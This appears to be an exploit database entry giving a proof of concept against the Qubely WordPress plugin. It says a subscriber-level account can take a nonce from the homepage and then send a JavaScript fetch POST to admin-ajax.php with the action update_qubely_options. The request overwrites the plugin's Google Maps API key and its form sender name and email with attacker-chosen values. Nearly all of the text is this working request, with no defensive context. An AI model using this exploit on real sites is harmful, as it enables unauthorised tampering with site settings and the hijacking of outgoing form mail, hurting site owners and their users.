## https://sploitus.com/exploit?id=WPEX-ID:A14FEF22-A21B-4E37-B75F-D3153055A2F6
As a subscriber (Nonce can be taken from the qubely_local_script-js-extra script on the homepage)
fetch("http://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action": "update_qubely_options", "options[qubely_gmap_api_key]": "attacker-key", "options[form_from_name]": "Attacker", "options[form_from_email]": "attacker@domain.com", "_wpnonce": "602dfb5e65"}),
"method": "POST",
"credentials": "include"
});